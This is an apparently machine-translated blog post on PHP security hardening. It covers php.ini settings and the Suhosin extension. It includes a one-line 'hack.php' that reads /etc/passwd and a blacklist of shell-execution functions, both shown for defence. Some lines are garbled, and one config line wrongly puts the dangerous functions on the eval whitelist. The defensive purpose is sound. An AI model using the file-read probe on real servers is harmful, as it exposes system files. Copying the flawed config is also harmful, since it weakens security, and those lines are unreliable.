Happy new year to you guys. I haven't updated my blog for another half month. Update is also more casual, think of what to write something, convenient and everyone work with learning summary.

Recently, I talked about PHP security related issues with my colleagues and recorded some experience.

Due to many reasons of script language and early version design, there are many security risks in php project. From the perspective of configuration options, you can do the following optimization.

1. Block PHP error output.
In / etc / php.ini (the default configuration file location), change the following configuration value to Off

display_errors=Off

Do not output the error stack information directly to the web page to prevent hackers from using the relevant information.

The right approach is:
Write the error log to the log file for troubleshooting.

 

2. Block PHP version.
By default, the PHP version will be displayed in the return header, such as:
Response Headers X-powered-by: PHP/7.2.0

Change the following configuration value in php.ini to Off

expose_php=Off

 

3. Turn off global variables.
If you turn on global variables, the data submitted by some forms will be automatically registered as global variables. The code is as follows:

<form action="/login" method="post">
<input name="username" type="text">
<input name="password" type="password">
<input type="submit" value="submit" name="submit">
</form>

If the global variable is enabled, the server-side PHP script can use $username and $password to get the user name and password, which will cause great danger of script injection.

The opening method is modified in php.ini as follows:

register_globals=On

It is recommended to close, with the following parameters:

register_globals=Off

When it is closed, you can only GET the relevant parameters from $'POST, $'GET, $'REQUEST.

 

4. File system restrictions
You can restrict the system directories that PHP can access through open Φ basedir.

If you don't restrict the use of the following script code (hack.php), you can get the system password.

<?php

echo file_get_contents('/etc/passwd');

 

When it is set, an error will be reported and relevant information will not be displayed, so that system directory b will not be accessed illegally:

PHP Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www) in /var/www/hack.php on line 3

Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www) in /var/www/hack.php on line 3 PHP Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/hack.php on line 3

Warning: file_get_contents(/etc/passwd): failed to open stream: Operation not permitted in /var/www/hack.php on line 3

The setting method is as follows:

open_basedir=/var/www

 

5. Prohibit remote resource access.

allow_url_fopen=Off

allow_url_include=Off

Other third party security extensions
6.Suhosin.
Suhosin is a protection system for PHP programs. It is designed to protect servers and users from known or unknown defects in PHP programs and PHP core (it feels practical and can resist some small attacks). Suhosin has two independent parts, which can be used separately or jointly.

The first part is a patch for PHP core, which can resist the weakness of buffer overflow or format string (this is necessary!) ;

The second part is a powerful PHP extension (the extension mode is very good, easy to install...) , including all other protection measures.

Installation extension

wget http://download.suhosin.org/suhosin-0.9.37.1.tar.gz
tar zxvf suhosin-0.9.37.1.tar.gz
cd suhosin-0.9.37.1/
phpize
./configure  --with-php-config=/usr/local/bin/php-config
make
make install
//At php.ini Lower join suhosin.so that will do

extension=suhosin.so

 

Characteristic

1. Simulator protection mode
2. Add two functions sha256() and sha256 file() to the PHP core
3. All platforms, add crypt? Blowfish to function crypt()
4. Turn on transparent protection for phpinfo() page
5. SQL database user protection (test phase)

Runtime protection

1. Encrypt cookies
2. Prevent different types of inclusion vulnerabilities (do not allow remote URL inclusion (black / white list); do not allow uploaded files; prevent directory traversal attacks)
3. Allow to disable preg_replace()
4. Allow eval() function to be disabled
5. Prevent infinite recursion by configuring a maximum execution depth
6. Support black and white list configuration for each vhost
7. Provide separate black and white list of functions for code execution
8. Prevent HTTP response splitting vulnerability
9. Prevent scripts from controlling the memory "limit option
10. Protect PHP's super globals, such as extract(), import_request_vars()
11. Prevent new line attack of mail() function
12. Prevent the attack of preg_replace()

Session protection

1. Encrypt session data
2. Prevent session hijacking
3. Prevent super long session id
4. Prevent malicious session id

The data in SESSION is usually stored in plaintext on the server. Here, we encrypt and decrypt $'u SESSION on the server. In this way, when the SESSION handle is stored in Memcache or database, it will not be easily broken. In many cases, our SESSION data will store some sensitive fields.

This feature is enabled by default and can also be modified through php.ini:

suhosin.session.encrypt = On
suhosin.session.cryptkey = zuHywawAthLavJohyRilvyecyondOdjo
suhosin.session.cryptua = On
suhosin.session.cryptdocroot = On

;; IPv4 only
suhosin.session.cryptraddr = 0
suhosin.session.checkraddr = 0

 

Cookie encryption

The HTTP header of the cookie in the client browser is also clear text. By encrypting cookies, you can protect your application against many attacks, such as

• Cookie tampering: an attacker may try to guess other reasonable cookie values to attack the program.
• Use cookies across applications: improperly configured applications may have the same session store. For example, if all sessions are stored in the / tmp directory by default, the cookies of one application may never be reused for another application as long as the encryption key is different.

Configuration of Cookie encryption in php.ini:

suhosin.cookie.encrypt = On

;; the cryptkey should be generated, e.g. with 'apg -m 32'
suhosin.cookie.cryptkey = oykBicmyitApmireipsacsumhylWaps1
suhosin.cookie.cryptua = On
suhosin.cookie.cryptdocroot = On

;; whitelist/blacklist (use only one)
;suhosin.cookie.cryptlist = WALLET,IDEAS
suhosin.cookie.plainlist = LANGUAGE

;; IPv4 only
suhosin.cookie.cryptraddr = 0
suhosin.cookie.checkraddr = 0
Blocking Functions
//test

##The default PHP Session is saved in the tmp path
ll  -rt /tmp | grep sess
##View the data of a session when the extension is not enabled
cat  sess_ururh83qvkkhv0n51lg17r4aj6
//Records are clear text
##View the data of a session after the extension is enabled
cat  sess_ukkiiiheedupem8k4hheo0b0v4
//The record is ciphertext
//We can see the importance of encryption to security

Blocking function

White list

##Explicitly specify the specified whitelist list
suhosin.executor.func.whitelist = htmlentities,htmlspecialchars,base64_encode
suhosin.executor.eval.whitelist = htmlentities,htmlspecialchars,base64_encode

<?php
echo htmlentities('<test>');
eval('echo htmlentities("<test>");');

Blacklist

##Explicitly specify the specified blacklist list
suhosin.executor.func.blacklist = assert,unserialize,exec,popen,proc_open,passthru,shell_exec,system,hail,parse_str,mt_srand
suhosin.executor.eval.whitelist = assert,unserialize,exec,popen,proc_open,passthru,shell_exec,system,hail,parse_str,mt_srand
//View the black and white list of illegal calls through the log

suhosin.simulation = 1
suhosin.log.file = 511
suhosin.log.file.name = /tmp/suhosin-alert.log

Other configuration items

suhosin.executor.include.max_traversal    The maximum depth of directory expansion, which can shield switching to illegal path
suhosin.executor.include.whitelist        Allowed to include URL，Comma separated
suhosin.executor.include.blacklist        Prohibited URL，Comma separated
suhosin.executor.disable_eval = On        Prohibit eval function

suhosin.upload.max_uploads
suhosin.upload.disallow_elf
suhosin.upload.disallow_binary
suhosin.upload.remove_binary
suhosin.upload.verification_script        Upload file check script to check whether the uploaded content contains webshell Features

With Suhosin, you can get some error logs. You can put these logs in the system log or write them to any other log file at the same time;

It can also create blacklist and whitelist for each virtual host;

You can filter GET and POST requests, file uploads, and cookie s;

You can also send encrypted sessions and cookie s, and you can set storage lines that cannot be transferred, etc;

Unlike the original PHP enhanced patch, Suhosin is compatible with third-party extensions like Zend Optimizer.